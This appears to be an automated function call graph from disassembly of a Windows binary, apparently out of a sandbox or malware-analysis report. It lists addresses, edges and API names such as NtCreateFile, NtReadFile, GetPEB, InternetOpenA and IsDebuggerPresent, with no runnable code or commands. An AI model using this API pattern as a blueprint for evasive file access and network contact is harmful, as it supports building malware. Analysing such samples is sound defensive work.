35b1a3 37076->37083 37084 35ba51 37077->37084 37091 35ff80 41 API calls 37077->37091 37524 356070 37078->37524 37086 35a256 37079->37086 37087 35c7c9 37080->37087 37088 35ab26 37081->37088 37089 35e940 41 API calls 37082->37089 37090 35f990 96 API calls 37083->37090 37100 360fc0 41 API calls 37084->37100 37093 35a26b 37086->37093 37102 35ff80 41 API calls 37086->37102 37094 356f10 96 API calls 37087->37094 37095 35e940 41 API calls 37088->37095 37096 35c393 37089->37096 37099 35b1b5 37090->37099 37091->37084 37111 360fc0 41 API calls 37093->37111 37103 35c7f0 37094->37103 37104 35ab2d 37095->37104 37096->36832 37120 356f10 96 API calls 37096->37120 37105 35bea2 37097->37105 37106 35a6e3 37098->37106 37107 35f9e0 96 API calls 37099->37107 37101 356f10 96 API calls 37109 35afb3 37101->37109 37102->37093 37110 35e940 41 API calls 37103->37110 37104->36782 37128 356f10 96 API calls 37104->37128 37112 35beb7 37105->37112 37113 35ff80 41 API calls 37105->37113 37114 35a6f8 37106->37114 37122 35ff80 41 API calls 37106->37122 37115 35b1c9 37107->37115 37117 35e940 41 API calls 37109->37117 37118 35c7f7 37110->37118 37119 35a2f2 37111->37119 37113->37112 37133 360fc0 41 API calls 37114->37133 37123 35f8d0 41 API calls 37115->37123 37125 35afba 37117->37125 37118->36832 37126 35c81e 37118->37126 37127 35a307 37119->37127 37136 35ff80 41 API calls 37119->37136 37129 35c3d6 37120->37129 37122->37114 37132 35b1d9 37123->37132 37125->36782 37135 35afe1 37125->37135 37144 360fc0 41 API calls 37127->37144 37137 35ab70 37128->37137 37140 35f970 41 API calls 37132->37140 37141 35a77f 37133->37141 37153 356f10 96 API calls 37135->37153 37136->37127 37145 35ab85 37137->37145 37146 35ff80 41 API calls 37137->37146 37149 35b1ef 37140->37149 37150 35a794 37141->37150 37160 35ff80 41 API calls 37141->37160 37155 35a38f 37144->37155 37156 360fc0 41 API calls 37145->37156 37146->37145 37159 35f8d0 41 API calls 37149->37159 37170 360fc0 41 API calls 37150->37170 37151 355ce0 6 API calls 37161 35a119 37151->37161 37162 35affd 37153->37162 37164 355340 46 API calls 37155->37164 37165 35ac0c 37156->37165 37169 35b1ff 37159->37169 37160->37150 37171 3558c0 20 API calls 37161->37171 37172 35b012 37162->37172 37180 35ff80 41 API calls 37162->37180 37209 35a3ac error_info_injector 37164->37209 37174 35ac21 37165->37174 37182 35ff80 41 API calls 37165->37182 37168->37151 37177 35f970 41 API calls 37169->37177 37178 35a81c 37170->37178 37179 35a124 GetProcessHeap HeapFree 37171->37179 37530 35f970 37172->37530 37189 360fc0 41 API calls 37174->37189 37185 35b210 37177->37185 37186 355340 46 API calls 37178->37186 37179->36922 37180->37172 37182->37174 37548 3558b0 37185->37548 37224 35a839 error_info_injector 37186->37224 37195 35aca9 37189->37195 37199 355340 46 API calls 37195->37199 37236 35acc6 error_info_injector 37199->37236 37210 355ce0 6 API calls 37209->37210 37214 35a5a6 37210->37214 37211 35b235 37215 35edc0 39 API calls 37211->37215 37219 3558c0 20 API calls 37214->37219 37220 35b240 37215->37220 37222 35a5b1 GetProcessHeap HeapFree 37219->37222 37223 35edc0 39 API calls 37220->37223 37222->36936 37227 35b24b 37223->37227 37225 355ce0 6 API calls 37224->37225 37228 35aa33 37225->37228 37233 35edc0 39 API calls 37227->37233 37229 3558c0 20 API calls 37228->37229 37234 35aa3e GetProcessHeap HeapFree 37229->37234 37242 35b256 37233->37242 37234->36950 37237 355ce0 6 API calls 37236->37237 37245 35aec0 37237->37245 37248 35edc0 39 API calls 37242->37248 37251 3558c0 20 API calls 37245->37251 37254 35b261 37248->37254 37257 35aecb GetProcessHeap HeapFree 37251->37257 37258 35edc0 39 API calls 37254->37258 37257->36977 37261 35b26c 37258->37261 37262 35edc0 39 API calls 37261->37262 37265 35b277 37262->37265 37556 355ce0 37265->37556 37269 35b287 37574 3558c0 37269->37574 37273 35b292 GetProcessHeap RtlFreeHeap 37273->37044 37281 356f10 96 API calls 37280->37281 37282 36d5d7 37281->37282 37690 36f050 37282->37690 37284 36d5fa 37285 36d646 error_info_injector 37284->37285 37287 36d6cf 37284->37287 37286 355340 46 API calls 37285->37286 37288 36d663 37286->37288 37289 380fd8 39 API calls 37287->37289 37290 355ce0 6 API calls 37288->37290 37291 36d6d4 37289->37291 37292 36d686 37290->37292 37293 380fd8 39 API calls 37291->37293 37294 3558c0 20 API calls 37292->37294 37295 36d6d9 37293->37295 37296 36d690 37294->37296 37296->37291 37297 36d6b6 error_info_injector 37296->37297 37298 374a11 CatchGuardHandler 5 API calls 37297->37298 37299 36d6cb 37298->37299 37299->36399 37301 35ee10 41 API calls 37300->37301 37302 3564b0 37301->37302 37303 374780 96 API calls 37302->37303 37304 3564ba 37303->37304 37305 374650 96 API calls 37304->37305 37306 3564c5 37305->37306 37307 374650 96 API calls 37306->37307 37308 3564e3 37307->37308 37309 374650 96 API calls 37308->37309 37310 3564f1 37309->37310 37311 374650 96 API calls 37310->37311 37312 3564ff GetModuleHandleW GetModuleHandleW FreeLibrary FreeLibrary 37311->37312 37313 356535 InternetOpenA 37312->37313 37313->36413 37316 356f10 96 API calls 37315->37316 37317 3565b3 37316->37317 37318 35e940 41 API calls 37317->37318 37319 3565bb 37318->37319 37320 356935 37319->37320 37321 3565dc 37319->37321 37696 37b1dd 39 API calls __CreateFrameInfo 37320->37696 37323 356f10 96 API calls 37321->37323 37325 3565f6 37323->37325 37324 35693a 37326 380fd8 39 API calls 37324->37326 37327 374780 96 API calls 37325->37327 37328 35693f 37326->37328 37331 35660a 37327->37331 37697 37b1dd 39 API calls __CreateFrameInfo 37328->37697 37330 356944 37333 380fd8 39 API calls 37330->37333 37331->37324 37332 356638 error_info_injector 37331->37332 37334 356f10 96 API calls 37332->37334 37335 356949 37333->37335 37336 35667c 37334->37336 37337 35e940 41 API calls 37336->37337 37338 356684 37337->37338 37339 374650 96 API calls 37338->37339 37340 356692 37339->37340 37341 356f10 96 API calls 37340->37341 37342 3566b9 37341->37342 37343 35e940 41 API calls 37342->37343 37344 3566c1 37343->37344 37344->37328 37345 3566e2 37344->37345 37346 356f10 96 API calls 37345->37346 37347 3566fc 37346->37347 37347->37330 37348 356743 error_info_injector 37347->37348 37349 356f10 96 API calls 37348->37349 37350 356787 37349->37350 37351 35e940 41 API calls 37350->37351 37352 35678f 37351->37352 37353 374650 96 API calls 37352->37353 37354 35679d 37353->37354 37355 356f10 96 API calls 37354->37355 37356 3567c5 37355->37356 37357 35e940 41 API calls 37356->37357 37358 3567cd 37357->37358 37359 374650 96 API calls 37358->37359 37360 3567db 37359->37360 37361 356f10 96 API calls 37360->37361 37362 356803 37361->37362 37363 35e940 41 API calls 37362->37363 37364 35680b 37363->37364 37365 374650 96 API calls 37364->37365 37366 356819 37365->37366 37367 356f10 96 API calls 37366->37367 37368 356841 37367->37368 37369 35e940 41 API calls 37368->37369 37370 356849 37369->37370 37371 374650 96 API calls 37370->37371 37372 356857 37371->37372 37373 356f10 96 API calls 37372->37373 37374 35687f 37373->37374 37375 35e940 41 API calls 37374->37375 37376 356887 37375->37376 37377 374650 96 API calls 37376->37377 37378 356895 37377->37378 37379 356f10 96 API calls 37378->37379 37380 3568bd 37379->37380 37381 35e940 41 API calls 37380->37381 37382 3568c5 37381->37382 37383 374650 96 API calls 37382->37383 37384 3568d3 37383->37384 37385 356f10 96 API calls 37384->37385 37386 3568fb 37385->37386 37387 35e940 41 API calls 37386->37387 37388 356903 37387->37388 37389 374650 96 API calls 37388->37389 37390 356911 37389->37390 37391 35f110 41 API calls 37390->37391 37392 35691f 37391->37392 37393 374a11 CatchGuardHandler 5 API calls 37392->37393 37394 35692f 37393->37394 37394->36427 37395 354db0 37394->37395 37396 354dd0 37395->37396 37397 3552ac 37395->37397 37396->37397 37402 354deb 37396->37402 37398 374a11 CatchGuardHandler 5 API calls 37397->37398 37399 3552c2 37398->37399 37399->36431 37400 354e02 37401 374a11 CatchGuardHandler 5 API calls 37400->37401 37403 354e18 37401->37403 37402->37400 37407 354e47 __CreateFrameInfo 37402->37407 37403->36431 37404 355239 37405 374a11 CatchGuardHandler 5 API calls 37404->37405 37406 35524f 37405->37406 37406->36431 37407->37404 37408 355253 37407->37408 37409 355288 37408->37409 37698 37a8c6 68 API calls ___scrt_uninitialize_crt 37408->37698 37411 374a11 CatchGuardHandler 5 API calls 37409->37411 37413 3552a8 37411->37413 37412 355266 37412->37409 37414 35526e 37412->37414 37413->36431 37415 374a11 CatchGuardHandler 5 API calls 37414->37415 37416 355284 37415->37416 37416->36431 37418 35441f 37417->37418 37420 3544bc 37417->37420 37418->37420 37699 37aa3e 69 API calls ___std_exception_copy 37418->37699 37421 353aa0 37420->37421 37422 353abf 37421->37422 37424 353b55 37421->37424 37422->37424 37700 37aa3e 69 API calls ___std_exception_copy 37422->37700 37424->36432 37425->36434 37426->36427 37428->36703 37430 35ef29 37429->37430 37431 35ea55 37430->37431 37436 37b1dd 39 API calls __CreateFrameInfo 37430->37436 37433 365a60 41 API calls error_info_injector 37431->37433 37433->36728 37440 3603c7 error_info_injector 37437->37440 37442 360437 37437->37442 37438 3603b0 41 API calls 37438->37440 37440->37438 37441 360440 37440->37441 37440->37442 37455 35ead0 37440->37455 37443 380fd8 39 API calls 37441->37443 37442->36755 37444 360445 37443->37444 37447->36746 37448->36755 37450 35f5b5 error_info_injector 37449->37450 37451 35f57a 37449->37451 37450->36730 37451->37450 37452 380fd8 39 API calls 37451->37452 37453 35f5db 37452->37453 37456 35f110 41 API calls 37455->37456 37457 35eae2 37456->37457 37457->37440 37458->36762 37459->36764 37461 361003 37460->37461 37462 36118b 37461->37462 37463 3610cb 37461->37463 37467 361008 _Yarn 37461->37467 37621 356060 41 API calls CatchGuardHandler 37462->37621 37468 361126 37463->37468 37469 361100 37463->37469 37465 361190 37622 355fc0 41 API calls 3 library calls 37465->37622 37467->36797 37472 374c1c std::_Facet_Register 41 API calls 37468->37472 37476 361118 _Yarn 37468->37476 37469->37465 37471 36110b 37469->37471 37470 361111 37473 380fd8 39 API calls 37470->37473 37470->37476 37474 374c1c std::_Facet_Register 41 API calls 37471->37474 37472->37476 37475 36119a 37473->37475 37474->37470 37476->36797 37478 35ee3b 37477->37478 37479 35eefb 37478->37479 37483 35ee4c 37478->37483 37623 356060 41 API calls CatchGuardHandler 37479->37623 37480 35ee58 _Yarn 37480->36920 37482 35ef00 37624 355fc0 41 API calls 3 library calls 37482->37624 37483->37480 37486 35eec7 37483->37486 37487 35eea6 37483->37487 37485 35eeb3 37489 380fd8 39 API calls 37485->37489 37493 35eebc _Yarn 37485->37493 37492 374c1c std::_Facet_Register 41 API calls 37486->37492 37486->37493 37487->37482 37488 35eead 37487->37488 37490 374c1c std::_Facet_Register 41 API calls 37488->37490 37491 35ef0a 37489->37491 37490->37485 37492->37493 37493->36920 37495 373990 72 API calls 37494->37495 37496 373c39 37495->37496 37625 35fbd0 37496->37625 37498 373c42 37499 373c75 error_info_injector 37498->37499 37501 373e43 37498->37501 37629 374780 GetPEB 37499->37629 37504 380fd8 39 API calls 37501->37504 37502 373cdf 37503 374780 92 API calls 37502->37503 37505 373ceb 37503->37505 37506 373e48 37504->37506 37645 374650 37505->37645 37508 380fd8 39 API calls 37506->37508 37510 373e4d 37508->37510 37509 373cf8 37511 374650 92 API calls 37509->37511 37512 373d05 37511->37512 37513 374650 92 API calls 37512->37513 37514 373d13 NtCreateFile 37513->37514 37516 373d5a GetProcessHeap RtlAllocateHeap 37514->37516 37518 373d75 NtReadFile 37516->37518 37522 373da1 error_info_injector 37516->37522 37518->37522 37520 373e24 error_info_injector 37521 374a11 CatchGuardHandler 5 API calls 37520->37521 37523 359d87 37521->37523 37522->37506 37522->37520 37523->36931 37525 35608e 37524->37525 37656 363710 37525->37656 37527 3560e7 37528 374a11 CatchGuardHandler 5 API calls 37527->37528 37529 3560f6 37528->37529 37529->37101 37531 360fc0 41 API calls 37530->37531 37532 35b097 37531->37532 37533 35f8d0 37532->37533 37534 35ecd0 41 API calls 37533->37534 37536 35f9b7 37535->37536 37536->37536 37537 356f10 96 API calls 37536->37537 37538 35f9cb 37537->37538 37539 35e940 41 API calls 37538->37539 37540 35b183 37539->37540 37541 35f9e0 37540->37541 37542 35fa21 37541->37542 37543 35fa02 37541->37543 37676 37b1dd 39 API calls __CreateFrameInfo 37542->37676 37546 356f10 96 API calls 37543->37546 37547 35b190 37546->37547 37547->37076 37549 355340 46 API calls 37548->37549 37550 3558b7 37549->37550 37551 35edc0 37550->37551 37552 35ede6 error_info_injector 37551->37552 37553 35edcb 37551->37553 37552->37211 37553->37552 37554 380fd8 39 API calls 37553->37554 37555 35ee0a 37554->37555 37557 355d0f 37556->37557 37558 355cfb 37556->37558 37563 355d36 37557->37563 37564 355d8c 37557->37564 37571 355d6b 37557->37571 37559 374a11 CatchGuardHandler 5 API calls 37558->37559 37561 355d0b 37559->37561 37560 374a11 CatchGuardHandler 5 API calls 37562 355d88 37560->37562 37561->37269 37562->37269 37570 355d55 37563->37570 37563->37571 37677 3536f0 6 API calls 2 library calls 37564->37677 37566 355da5 37567 355dad 37566->37567 37566->37571 37568 374a11 CatchGuardHandler 5 API calls 37567->37568 37569 355dc1 37568->37569 37569->37269 37572 374a11 CatchGuardHandler 5 API calls 37570->37572 37571->37560 37573 355d67 37572->37573 37573->37269 37575 3558f2 37574->37575 37576 3558de 37574->37576 37584 35591e 37575->37584 37678 3536f0 6 API calls 2 library calls 37575->37678 37577 374a11 CatchGuardHandler 5 API calls 37576->37577 37578 3558ee 37577->37578 37578->37273 37579 355cb9 37582 374a11 CatchGuardHandler 5 API calls 37579->37582 37580 37b1b7 ___std_exception_copy 14 API calls 37580->37579 37583 355cd2 37582->37583 37583->37273 37584->37579 37584->37580 37621->37465 37622->37470 37623->37482 37624->37485 37626 35fc80 37625->37626 37628 35fbf4 _Yarn 37625->37628 37653 365880 41 API calls 2 library calls 37626->37653 37628->37498 37630 3749e0 37629->37630 37633 3747bb __CreateFrameInfo error_info_injector 37629->37633 37631 374a11 CatchGuardHandler 5 API calls 37630->37631 37632 3749ef 37631->37632 37632->37502 37633->37630 37633->37633 37634 374818 WideCharToMultiByte 37633->37634 37637 3812d1 43 API calls 37633->37637 37638 356f10 94 API calls 37633->37638 37639 374a0b 37633->37639 37640 3749f5 37633->37640 37655 37b01e 39 API calls 2 library calls 37633->37655 37654 37b01e 39 API calls 2 library calls 37634->37654 37637->37633 37638->37633 37641 380fd8 39 API calls 37639->37641 37642 374a11 CatchGuardHandler 5 API calls 37640->37642 37644 374a10 37641->37644 37643 374a05 37642->37643 37643->37502 37646 374663 37645->37646 37647 37466e error_info_injector 37645->37647 37646->37509 37647->37647 37648 356f10 96 API calls 37647->37648 37649 374753 37647->37649 37650 37477a 37647->37650 37648->37647 37649->37509 37651 380fd8 39 API calls 37650->37651 37652 37477f 37651->37652 37653->37628 37654->37633 37655->37633 37657 36374f 37656->37657 37658 36373b 37656->37658 37659 363816 37657->37659 37661 36375d 37657->37661 37658->37527 37674 356060 41 API calls CatchGuardHandler 37659->37674 37663 363769 _Yarn 37661->37663 37665 3637ba 37661->37665 37666 3637db 37661->37666 37662 36381b 37675 355fc0 41 API calls 3 library calls 37662->37675 37663->37527 37665->37662 37668 3637c1 37665->37668 37670 374c1c std::_Facet_Register 41 API calls 37666->37670 37673 3637d0 _Yarn 37666->37673 37667 3637c7 37669 380fd8 39 API calls 37667->37669 37667->37673 37671 374c1c std::_Facet_Register 41 API calls 37668->37671 37672 363825 37669->37672 37670->37673 37671->37667 37673->37527 37674->37662 37675->37667 37677->37566 37678->37584 37691 36f0d8 37690->37691 37694 36f06a _Yarn 37690->37694 37695 36f3b0 41 API calls 4 library calls 37691->37695 37693 36f0e6 37693->37284 37694->37284 37695->37693 37698->37412 37699->37420 37700->37424 37701->36467 37702->36467 37705 35ef10 39 API calls 37704->37705 37706 35fafc 37705->37706 37714 363830 37706->37714 37713->36467 37715 36389f 37714->37715 37719 37f2d9 37715->37719 37725 386179 GetLastError 37719->37725 37724 3619f0 44 API calls CatchGuardHandler 37726 386195 37725->37726 37727 38618f 37725->37727 37731 386199 SetLastError 37726->37731 37756 386e37 6 API calls __Wcrtomb 37726->37756 37764 386df8 6 API calls __Wcrtomb 37727->37764 37730 3861b1 37730->37731 37757 3851f1 37730->37757 37735 37f2e4 37731->37735 37736 38622e 37731->37736 37752 3870e6 37735->37752 37769 37b1dd 39 API calls __CreateFrameInfo 37736->37769 37737 3861ce 37765 386e37 6 API calls __Wcrtomb 37737->37765 37738 3861df 37766 386e37 6 API calls __Wcrtomb 37738->37766 37743 3861dc 37747 38524e ___free_lconv_mon 14 API calls 37743->37747 37744 3861eb 37745 3861ef 37744->37745 37746 386206 37744->37746 37767 386e37 6 API calls __Wcrtomb 37745->37767 37768 385fa4 14 API calls __Wcrtomb 37746->37768 37747->37731 37750 386211 37751 38524e ___free_lconv_mon 14 API calls 37750->37751 37751->37731 37753 3870f9 37752->37753 37755 363959 37752->37755 37753->37755 37772 38c4a1 39 API calls 3 library calls 37753->37772 37755->37724 37756->37730 37762 3851fe __Wcrtomb 37757->37762 37758 38523e 37771 37b13c 14 API calls __Wcrtomb 37758->37771 37759 385229 RtlAllocateHeap 37760 38523c 37759->37760 37759->37762 37760->37737 37760->37738 37762->37758 37762->37759 37770 381349 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 37762->37770 37764->37726 37765->37743 37766->37744 37767->37743 37768->37750 37770->37762 37771->37760 37772->37755 37773->36499 37774->36509 37776 374c1c std::_Facet_Register 41 API calls 37775->37776 37777 36624f 37776->37777 37791 369e80 37777->37791 37781 3661d3 37780->37781 37782 35ebb2 37780->37782 37783 366223 37781->37783 37784 3661db 37781->37784 37782->36355 37817 35f560 41 API calls 37783->37817 37799 35f710 37784->37799 37787 3661e2 37787->37782 37789 35eb40 41 API calls 37787->37789 37789->37787 37790->36531 37792 369ec4 37791->37792 37793 35eb86 37791->37793 37794 374c1c std::_Facet_Register 41 API calls 37792->37794 37793->36355 37795 369ecb 37794->37795 37796 35ee10 41 API calls 37795->37796 37797 369ee2 37796->37797 37798 35eb40 41 API calls 37797->37798 37798->37793 37800 35f761 37799->37800 37801 35f71d 37799->37801 37818 355fc0 41 API calls 3 library calls 37800->37818 37802 35f727 37801->37802 37803 35f74a 37801->37803 37802->37800 37805 35f72e 37802->37805 37806 35f75b 37803->37806 37808 374c1c std::_Facet_Register 41 API calls 37803->37808 37807 374c1c std::_Facet_Register 41 API calls 37805->37807 37806->37787 37810 35f734 37807->37810 37811 35f754 37808->37811 37809 380fd8 39 API calls 37814 35f76b 37809->37814 37810->37809 37812 35f73d 37810->37812 37811->37787 37812->37787 37813 35f794 error_info_injector 37813->37787 37814->37813 37815 380fd8 39 API calls 37814->37815 37816 35f7a9 37815->37816 37818->37810 37819->36541 37820->36546 37822 381001 37821->37822 37825 380dcc 37822->37825 37826 380de8 __CreateFrameInfo 37825->37826 37827 380e14 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 37826->37827 37828 380ee5 __CreateFrameInfo 37827->37828 37829 374a11 CatchGuardHandler 5 API calls 37828->37829 37830 380f03 GetCurrentProcess TerminateProcess 37829->37830 37830->36546 38651 3740c0 38652 356f10 96 API calls 38651->38652 38656 37410e 38652->38656 38653 374187 38654 3741ae error_info_injector 38653->38654 38658 3741cc 38653->38658 38655 374a11 CatchGuardHandler 5 API calls 38654->38655 38659 3741c6 38655->38659 38656->38653 38662 3600e0 38656->38662 38660 380fd8 39 API calls 38658->38660 38661 3741d1 38660->38661 38663 360210 38662->38663 38670 356060 41 API calls CatchGuardHandler 38663->38670 38665 360215 38671 355fc0 41 API calls 3 library calls 38665->38671 38667 36021a 38668 380fd8 39 API calls 38667->38668 38669 36021f 38668->38669 38670->38665 38671->38667 38628 36ff30 38629 35f110 41 API calls 38628->38629 38630 36ff47 38629->38630 38631 35f110 41 API calls 38630->38631 38632 36ff54 38631->38632 38633 35f110 41 API calls 38632->38633 38634 36ff61 38633->38634 38635 35f110 41 API calls 38634->38635 38636 36ff6e 38635->38636 38637 35f110 41 API calls 38636->38637 38638 36ff7b 38637->38638 38639 35f110 41 API calls 38638->38639 38640 36ff88 38639->38640 38641 35f110 41 API calls 38640->38641 38642 36ff94 38641->38642 38930 37a31a 38931 37a33d 38930->38931 38932 37a32a 38930->38932 38933 37a34f 38931->38933 38943 37a362 38931->38943 38969 37b13c 14 API calls __Wcrtomb 38932->38969 38971 37b13c 14 API calls __Wcrtomb 38933->38971 38936 37a32f 38970 380fc8 39 API calls ___std_exception_copy 38936->38970 38937 37a354 38972 380fc8 39 API calls ___std_exception_copy 38937->38972 38938 37a382 38973 37b13c 14 API calls __Wcrtomb 38938->38973 38939 37a393 38961 387ed4 38939->38961 38943->38938 38943->38939 38947 37a3aa 38948 37a5a0 38947->38948 38981 3873af 38947->38981 38949 380ff5 __Getctype 11 API calls 38948->38949 38951 37a5aa 38949->38951 38952 37a3bc 38952->38948 38988 3873db 38952->38988 38954 37a3ce 38954->38948 38955 37a3d7 38954->38955 38956 37a45c 38955->38956 38957 37a3f8 38955->38957 38960 37a339 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 38956->38960 38996 387f31 39 API calls 2 library calls 38956->38996 38957->38960 38995 387f31 39 API calls 2 library calls 38957->38995 38962 387ee0 __FrameHandler3::FrameUnwindToState 38961->38962 38963 37a398 38962->38963 38997 383f51 EnterCriticalSection 38962->38997 38974 387383 38963->38974 38965 387f05 39010 387f28 LeaveCriticalSection std::_Lockit::~_Lockit 38965->39010 38966 387ef1 38966->38965 38998 387e1c 38966->38998 38969->38936 38970->38960 38971->38937 38972->38960 38973->38960 38975 38738f 38974->38975 38976 3873a4 38974->38976 39126 37b13c 14 API calls __Wcrtomb 38975->39126 38976->38947 38978 387394 39127 380fc8 39 API calls ___std_exception_copy 38978->39127 38980 38739f 38980->38947 38982 3873bb 38981->38982 38983 3873d0 38981->38983 39128 37b13c 14 API calls __Wcrtomb 38982->39128 38983->38952 38985 3873c0 39129 380fc8 39 API calls ___std_exception_copy 38985->39129 38987 3873cb 38987->38952 38989 3873fc 38988->38989 38990 3873e7 38988->38990 38989->38954 39130 37b13c 14 API calls __Wcrtomb 38990->39130 38992 3873ec 39131 380fc8 39 API calls ___std_exception_copy 38992->39131 38994 3873f7 38994->38954 38995->38960 38996->38960 38997->38966 39011 387972 38998->39011 39001 387e78 39003 387e75 39001->39003 39080 387cc2 39001->39080 39002 387e6f 39020 387a30 39002->39020 39006 38524e ___free_lconv_mon 14 API calls 39003->39006 39007 387e83 39006->39007 39008 374a11 CatchGuardHandler 5 API calls 39007->39008 39009 387e90 39008->39009 39009->38965 39010->38963 39012 387991 39011->39012 39017 387998 39012->39017 39112 38665c 15 API calls 2 library calls 39012->39112 39014 3879b9 39015 38524e ___free_lconv_mon 14 API calls 39014->39015 39015->39017 39016 3879b2 39016->39014 39018 3879db 39016->39018 39017->39001 39017->39002 39019 38524e ___free_lconv_mon 14 API calls 39018->39019 39019->39017 39021 387a40 39020->39021 39022 3873db 39 API calls 39021->39022 39023 387a61 39022->39023 39025 387383 39 API calls 39023->39025 39051 387cb5 39023->39051 39024 380ff5 __Getctype 11 API calls 39026 387cc1 39024->39026 39027 387a73 39025->39027 39031 3873db 39 API calls 39026->39031 39029 387ae9 39027->39029 39027->39051 39113 38665c 15 API calls 2 library calls 39027->39113 39029->39003 39030 387ada 39032 387aef 39030->39032 39033 387ae1 39030->39033 39034 387cef 39031->39034 39036 38524e ___free_lconv_mon 14 API calls 39032->39036 39035 38524e ___free_lconv_mon 14 API calls 39033->39035 39037 387e11 39034->39037 39040 387383 39 API calls 39034->39040 39035->39029 39039 387afa 39036->39039 39038 380ff5 __Getctype 11 API calls 39037->39038 39041 387e1b 39038->39041 39114 38a818 39 API calls 2 library calls 39039->39114 39042 387d01 39040->39042 39044 387972 15 API calls 39041->39044 39042->39037 39043 3873af 39 API calls 39042->39043 39046 387d13 39043->39046 39047 387e55 39044->39047 39046->39037 39049 387d1c 39046->39049 39050 387e78 39047->39050 39053 387e6f 39047->39053 39048 387b21 39048->39051 39062 387b2c __CreateFrameInfo 39048->39062 39052 38524e ___free_lconv_mon 14 API calls 39049->39052 39054 387e75 39050->39054 39055 387cc2 44 API calls 39050->39055 39051->39024 39056 387d27 GetTimeZoneInformation 39052->39056 39057 387a30 44 API calls 39053->39057 39058 38524e ___free_lconv_mon 14 API calls 39054->39058 39055->39054 39063 387deb 39056->39063 39066 387d43 __CreateFrameInfo 39056->39066 39057->39054 39059 387e83 39058->39059 39060 374a11 CatchGuardHandler 5 API calls 39059->39060 39061 387e90 39060->39061 39061->39003 39115 3879e9 45 API calls 5 library calls 39062->39115 39063->39003 39065 387b71 39116 37f293 40 API calls 2 library calls 39065->39116 39120 384280 39 API calls __Getctype 39066->39120 39069 387dc6 39121 387e92 45 API calls 4 library calls 39069->39121 39071 387dd7 39122 387e92 45 API calls 4 library calls 39071->39122 39072 387ba5 39074 387c37 39072->39074 39117 37f293 40 API calls 2 library calls 39072->39117 39078 387c99 39074->39078 39119 3879e9 45 API calls 5 library calls 39074->39119 39077 387be2 39077->39074 39118 37f293 40 API calls 2 library calls 39077->39118 39078->39051 39081 387cd2 39080->39081 39082 3873db 39 API calls 39081->39082 39083 387cef 39082->39083 39084 387e11 39083->39084 39086 387383 39 API calls 39083->39086 39085 380ff5 __Getctype 11 API calls 39084->39085 39087 387e1b 39085->39087 39088 387d01 39086->39088 39090 387972 15 API calls 39087->39090 39088->39084 39089 3873af 39 API calls 39088->39089 39091 387d13 39089->39091 39092 387e55 39090->39092 39091->39084 39093 387d1c 39091->39093 39094 387e78 39092->39094 39096 387e6f 39092->39096 39095 38524e ___free_lconv_mon 14 API calls 39093->39095 39097 387e75 39094->39097 39098 387cc2 44 API calls 39094->39098 39099 387d27 GetTimeZoneInformation 39095->39099 39100 387a30 44 API calls 39096->39100 39101 38524e ___free_lconv_mon 14 API calls 39097->39101 39098->39097 39105 387deb 39099->39105 39106 387d43 __CreateFrameInfo 39099->39106 39100->39097 39102 387e83 39101->39102 39103 374a11 CatchGuardHandler 5 API calls 39102->39103 39104 387e90 39103->39104 39104->39003 39105->39003 39123 384280 39 API calls __Getctype 39106->39123 39108 387dc6 39124 387e92 45 API calls 4 library calls 39108->39124 39110 387dd7 39125 387e92 45 API calls 4 library calls 39110->39125 39112->39016 39113->39030 39114->39048 39115->39065 39116->39072 39117->39077 39118->39074 39119->39078 39120->39069 39121->39071 39122->39063 39123->39108 39124->39110 39125->39105 39126->38978 39127->38980 39128->38985 39129->38987 39130->38992 39131->38994 37831 374fb3 37832 374fbf __FrameHandler3::FrameUnwindToState 37831->37832 37856 374cc2 37832->37856 37834 374fc6 37835 37511f 37834->37835 37843 374ff0 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 37834->37843 37872 375363 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 37835->37872 37837 375126 37838 37512c 37837->37838 37873 381832 21 API calls __CreateFrameInfo 37837->37873 37874 3817f6 21 API calls __CreateFrameInfo 37838->37874 37841 375134 37842 37500f 37843->37842 37846 375090 37843->37846 37868 38180c 39 API calls 3 library calls 37843->37868 37864 38201e 37846->37864 37847 375096 37848 3750ad 37847->37848 37869 375493 GetModuleHandleW 37848->37869 37850 3750b7 37850->37837 37851 3750bb 37850->37851 37852 3750c4 37851->37852 37870 3817e7 21 API calls __CreateFrameInfo 37851->37870 37871 374e33 75 API calls ___scrt_uninitialize_crt 37852->37871 37855 3750cd 37855->37842 37857 374ccb 37856->37857 37875 37517f IsProcessorFeaturePresent 37857->37875 37859 374cd7 37876 37632c 10 API calls 2 library calls 37859->37876 37861 374cdc 37862 374ce0 37861->37862 37877 37634b 7 API calls 2 library calls 37861->37877 37862->37834 37865 38202c 37864->37865 37866 382027 37864->37866 37865->37847 37878 381b53 53 API calls 37866->37878 37868->37846 37869->37850 37870->37852 37871->37855 37872->37837 37873->37838 37874->37841 37875->37859 37876->37861 37877->37862 37878->37865 38672 3723f0 38682 372421 38672->38682 38673 372518 38759 37b1dd 39 API calls __CreateFrameInfo 38673->38759 38676 372507 38677 374a11 CatchGuardHandler 5 API calls 38676->38677 38678 372514 38677->38678 38679 35eb40 41 API calls 38679->38682 38680 35f110 41 API calls 38680->38682 38682->38673 38682->38676 38682->38679 38682->38680 38684 370940 38682->38684 38758 35e730 5 API calls CatchGuardHandler 38682->38758 38685 356f10 96 API calls 38684->38685 38686 370a47 38685->38686 38687 35e940 41 API calls 38686->38687 38757 370a4e _Yarn error_info_injector 38687->38757 38688 3723a3 38863 37b1dd 39 API calls __CreateFrameInfo 38688->38863 38690 3723a8 38691 380fd8 39 API calls 38690->38691 38692 3723ad 38691->38692 38693 371a3f 38694 355dd0 70 API calls 38693->38694 38697 37218a error_info_injector 38693->38697 38739 371a77 _Yarn error_info_injector 38694->38739 38695 371e25 38696 36d5a0 96 API calls 38695->38696 38698 371e30 __CreateFrameInfo 38696->38698 38697->38690 38705 372380 error_info_injector 38697->38705 38861 372940 39 API calls error_info_injector 38697->38861 38704 356f10 96 API calls 38698->38704 38699 374a11 CatchGuardHandler 5 API calls 38701 37239a 38699->38701 38701->38682 38702 37233c 38702->38690 38702->38705 38703 35ee10 41 API calls 38703->38739 38707 371e6c 38704->38707 38705->38699 38706 373c10 96 API calls 38706->38739 38708 3564a0 101 API calls 38707->38708 38712 371e7d error_info_injector 38708->38712 38709 356f10 96 API calls 38709->38739 38710 35eb40 41 API calls 38713 371ec1 38710->38713 38711 3664d0 